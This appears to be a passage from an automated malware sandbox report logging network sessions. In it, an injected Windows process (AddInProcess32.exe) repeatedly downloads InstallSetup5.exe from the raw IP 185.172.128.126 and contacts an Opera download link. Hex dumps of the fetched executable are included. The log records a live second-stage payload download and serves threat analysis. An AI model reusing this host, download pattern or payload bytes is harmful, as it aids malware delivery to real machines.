                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407372952 CET1286INData Raw: 85 d4 fe ff ff 8b 85 dc fe ff ff c7 44 24 0c 05 01 00 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 04 24 ff 95 d4 fe ff ff 83 ec 10 85 c0 75 3b 83 7d 10 00 8b 85 dc fe ff ff 74 14 89 04 24 ff 15 1c d3 42 00 50 b8 01 00 00 00 e9 81 00 00 00 c7 44 24
                                                                                                                                                                                                                                                            Data Ascii: D$|$D$$u;}t$BPD$|$$It$BQ$=mWt BD$t$$T$%=But$$$BRRe[^_]US4]B$"4
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407495975 CET1286INData Raw: 53 53 c7 04 24 e4 ff ff ff e9 e2 11 00 00 c7 04 24 00 00 00 00 e8 0a fa ff ff 89 c3 51 8d 85 a8 fe ff ff 89 44 24 0c 8b 85 74 fe ff ff c7 44 24 04 00 04 00 00 89 1c 24 89 44 24 08 ff 15 d0 d3 42 00 83 ec 10 85 c0 74 37 8b 85 a8 fe ff ff 31 ff 39
                                                                                                                                                                                                                                                            Data Ascii: SS$$QD$tD$$D$Bt719s=8t8$fRt,D$$^bPPlBtD$D$$B$VW1T$\$D$D$D$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407644987 CET1286INData Raw: f8 5d 00 00 01 c7 52 78 0e 81 ff ff 03 00 00 0f 8f 38 19 00 00 eb 02 31 ff c6 84 37 00 f0 42 00 00 e9 27 19 00 00 c7 04 24 20 00 00 00 e8 ec f4 ff ff 53 89 c3 c7 04 24 31 00 00 00 e8 dd f4 ff ff 83 bd a0 fe ff ff 00 56 89 44 24 04 89 1c 24 75 08
                                                                                                                                                                                                                                                            Data Ascii: ]Rx817B'$ S$1VD$$u\BXBQQ$RD$\$$BuB"u1<$\$XBWWty$S$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407711029 CET1286INData Raw: 24 04 89 34 24 ff 15 fc d4 42 00 8b 85 98 fe ff ff 8b bd b4 fe ff ff 51 51 0f af f8 c7 04 24 00 00 00 00 0f af 85 b0 fe ff ff 89 c3 e8 e7 ef ff ff 52 c7 44 24 14 10 00 00 00 89 7c 24 10 89 5c 24 0c c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 00
                                                                                                                                                                                                                                                            Data Ascii: $4$BQQ$RD$|$\$D$D$$<BD$D$D$r4$XB$dBp$BWD$Z$hBRR$Qt$D$H$B$(A}
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407742977 CET1286INData Raw: ff 50 ff d7 85 c0 0f 95 c0 0f b6 c0 89 c7 eb 46 8b 85 70 fe ff ff c7 44 24 10 00 a0 40 00 c7 44 24 0c 40 3c 41 00 c7 44 24 08 00 f0 42 00 c7 44 24 04 00 04 00 00 89 04 24 ff d7 31 ff eb 17 89 74 24 04 c7 04 24 f7 ff ff ff e8 8e 46 00 00 57 57 bf
                                                                                                                                                                                                                                                            Data Ascii: PFpD$@D$@<AD$BD$$1t$$FWW$ V$B$$$lRt$YQ$JSp$7V$E(Rl<
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407804012 CET1286INData Raw: 89 1c 24 ff 15 1c d3 42 00 50 eb 41 c7 04 24 22 00 00 00 e8 f4 e5 ff ff 8b 8d a0 fe ff ff 8b 95 94 fe ff ff 53 83 e1 02 85 d2 75 0c 8b 1d e4 bb 42 00 8d 93 01 00 00 80 89 4c 24 08 89 44 24 04 89 14 24 e8 46 e6 ff ff 83 ec 0c 89 c6 85 f6 0f 95 c0
                                                                                                                                                                                                                                                            Data Ascii: $BPA$"SuBL$D$$FuB$Rt$yQL$B<$D$ D$D$D$D$L$D$ B$M
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407850981 CET1286INData Raw: 26 c7 44 24 0c 01 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 ff ff ff ff 89 34 24 ff 15 3c d4 42 00 83 ec 10 eb 3f 8b 8d 6c fe ff ff 88 84 0f 00 f0 42 00 47 eb 2f 88 c3 8b 85 74 fe ff ff 47 84 db 88 5c 38 ff 74 1e 81 bd 70 fe ff ff ff 03 00 00
                                                                                                                                                                                                                                                            Data Ascii: &D$D$D$4$<B?lBG/tG\8tpNp9lBB$Q$iHS|$D$t$$<BaBT$%HR$B
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407972097 CET1286INData Raw: 00 83 ec 10 83 bd 90 fe ff ff 00 74 22 8b 85 70 fe ff ff c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 ff 15 24 d5 42 00 83 ec 0c 31 ff 01 3d e8 bb 42 00 31 d2 8d 65 f4 89 d0 5b 5e 5f 5d c2 04 00 55 89 e5 57 56 53 83 ec 1c 8b 75 08 8b
                                                                                                                                                                                                                                                            Data Ascii: t"pD$D$$$B1=B1e[^_]UWVSu}kPB8$=Qtv$Ru^X)tIBBD$0uT$B$BD$D$D$<$XBd1
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.714771032 CET1286INData Raw: 05 1c 7d 42 00 85 c0 0f 8f d0 fe ff ff a1 10 a0 40 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 54 24 04 89 04 24 ff 55 d4 83 ec 10 c7 04 24 01 00 00 00 e8 bd fc ff ff 31 c0 eb 03 83 c8 ff 8d 65 f4 5b 5e 5f 5d c2 04 00 55 89 e5 57 56 53
                                                                                                                                                                                                                                                            Data Ascii: }B@D$D$T$$U$1e[^_]UWVSLEx0xBD$D$}BD$@$<B$QNE}D$D$$BD$@|$$}E}B$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.179621935 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.513179064 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                                                                                                                                                                                                                                                            ETag: "1ca8e4-6135951a2b6e0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1878244
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 57 56 53 81 ec
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL WuC@ |p.text$ 0`.data@`.rdata8jl@`@.bss `.idata|@0.ndata@`.rsrcp@0UWVS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.007416010 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.465027094 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2228192.168.2.555567185.172.128.1268044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.218384027 CET82OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526312113 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                                                                                                                                                                                                                                                            ETag: "1ca8e4-6135951a2b6e0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1878244
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL WuC@ |p.text$ 0`.data@`.rdata8jl@`@.bss `.idata|@0.ndata@`.rsrcp@0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526390076 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 57 56 53 81 ec 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d
                                                                                                                                                                                                                                                            Data Ascii: UWVSUEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526443005 CET1286INData Raw: 85 d4 fe ff ff 8b 85 dc fe ff ff c7 44 24 0c 05 01 00 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 04 24 ff 95 d4 fe ff ff 83 ec 10 85 c0 75 3b 83 7d 10 00 8b 85 dc fe ff ff 74 14 89 04 24 ff 15 1c d3 42 00 50 b8 01 00 00 00 e9 81 00 00 00 c7 44 24
                                                                                                                                                                                                                                                            Data Ascii: D$|$D$$u;}t$BPD$|$$It$BQ$=mWt BD$t$$T$%=But$$$BRRe[^_]US4]B$"4
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526456118 CET1286INData Raw: 53 53 c7 04 24 e4 ff ff ff e9 e2 11 00 00 c7 04 24 00 00 00 00 e8 0a fa ff ff 89 c3 51 8d 85 a8 fe ff ff 89 44 24 0c 8b 85 74 fe ff ff c7 44 24 04 00 04 00 00 89 1c 24 89 44 24 08 ff 15 d0 d3 42 00 83 ec 10 85 c0 74 37 8b 85 a8 fe ff ff 31 ff 39
                                                                                                                                                                                                                                                            Data Ascii: SS$$QD$tD$$D$Bt719s=8t8$fRt,D$$^bPPlBtD$D$$B$VW1T$\$D$D$D$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526586056 CET1286INData Raw: f8 5d 00 00 01 c7 52 78 0e 81 ff ff 03 00 00 0f 8f 38 19 00 00 eb 02 31 ff c6 84 37 00 f0 42 00 00 e9 27 19 00 00 c7 04 24 20 00 00 00 e8 ec f4 ff ff 53 89 c3 c7 04 24 31 00 00 00 e8 dd f4 ff ff 83 bd a0 fe ff ff 00 56 89 44 24 04 89 1c 24 75 08
                                                                                                                                                                                                                                                            Data Ascii: ]Rx817B'$ S$1VD$$u\BXBQQ$RD$\$$BuB"u1<$\$XBWWty$S$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526757956 CET1286INData Raw: 24 04 89 34 24 ff 15 fc d4 42 00 8b 85 98 fe ff ff 8b bd b4 fe ff ff 51 51 0f af f8 c7 04 24 00 00 00 00 0f af 85 b0 fe ff ff 89 c3 e8 e7 ef ff ff 52 c7 44 24 14 10 00 00 00 89 7c 24 10 89 5c 24 0c c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 00
                                                                                                                                                                                                                                                            Data Ascii: $4$BQQ$RD$|$\$D$D$$<BD$D$D$r4$XB$dBp$BWD$Z$hBRR$Qt$D$H$B$(A}
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526822090 CET1286INData Raw: ff 50 ff d7 85 c0 0f 95 c0 0f b6 c0 89 c7 eb 46 8b 85 70 fe ff ff c7 44 24 10 00 a0 40 00 c7 44 24 0c 40 3c 41 00 c7 44 24 08 00 f0 42 00 c7 44 24 04 00 04 00 00 89 04 24 ff d7 31 ff eb 17 89 74 24 04 c7 04 24 f7 ff ff ff e8 8e 46 00 00 57 57 bf
                                                                                                                                                                                                                                                            Data Ascii: PFpD$@D$@<AD$BD$$1t$$FWW$ V$B$$$lRt$YQ$JSp$7V$E(Rl<
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526879072 CET1286INData Raw: 89 1c 24 ff 15 1c d3 42 00 50 eb 41 c7 04 24 22 00 00 00 e8 f4 e5 ff ff 8b 8d a0 fe ff ff 8b 95 94 fe ff ff 53 83 e1 02 85 d2 75 0c 8b 1d e4 bb 42 00 8d 93 01 00 00 80 89 4c 24 08 89 44 24 04 89 14 24 e8 46 e6 ff ff 83 ec 0c 89 c6 85 f6 0f 95 c0
                                                                                                                                                                                                                                                            Data Ascii: $BPA$"SuBL$D$$FuB$Rt$yQL$B<$D$ D$D$D$D$L$D$ B$M
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.526894093 CET1286INData Raw: 26 c7 44 24 0c 01 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 ff ff ff ff 89 34 24 ff 15 3c d4 42 00 83 ec 10 eb 3f 8b 8d 6c fe ff ff 88 84 0f 00 f0 42 00 47 eb 2f 88 c3 8b 85 74 fe ff ff 47 84 db 88 5c 38 ff 74 1e 81 bd 70 fe ff ff ff 03 00 00
                                                                                                                                                                                                                                                            Data Ascii: &D$D$D$4$<B?lBG/tG\8tpNp9lBB$Q$iHS|$D$t$$<BaBT$%HR$B
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.527020931 CET1286INData Raw: 00 83 ec 10 83 bd 90 fe ff ff 00 74 22 8b 85 70 fe ff ff c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 ff 15 24 d5 42 00 83 ec 0c 31 ff 01 3d e8 bb 42 00 31 d2 8d 65 f4 89 d0 5b 5e 5f 5d c2 04 00 55 89 e5 57 56 53 83 ec 1c 8b 75 08 8b
                                                                                                                                                                                                                                                            Data Ascii: t"pD$D$$$B1=B1e[^_]UWVSu}kPB8$=Qtv$Ru^X)tIBBD$0uT$B$BD$D$D$<$XBd1
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.835372925 CET1286INData Raw: 05 1c 7d 42 00 85 c0 0f 8f d0 fe ff ff a1 10 a0 40 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 54 24 04 89 04 24 ff 55 d4 83 ec 10 c7 04 24 01 00 00 00 e8 bd fc ff ff 31 c0 eb 03 83 c8 ff 8d 65 f4 5b 5e 5f 5d c2 04 00 55 89 e5 57 56 53
                                                                                                                                                                                                                                                            Data Ascii: }B@D$D$T$$U$1e[^_]UWVSLEx0xBD$D$}BD$@$<B$QNE}D$D$$BD$@|$$}E}B$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.341768026 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.652703047 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                                                                                                                                                                                                                                                            ETag: "1ca8e4-6135951a2b6e0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1878244
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 57 56 53 81 ec
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL WuC@ |p.text$ 0`.data@`.rdata8jl@`@.bss `.idata|@0.ndata@`.rsrcp@0UWVS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.157933950 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.090786934 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2229192.168.2.555577107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.750387907 CET135OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.967305899 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
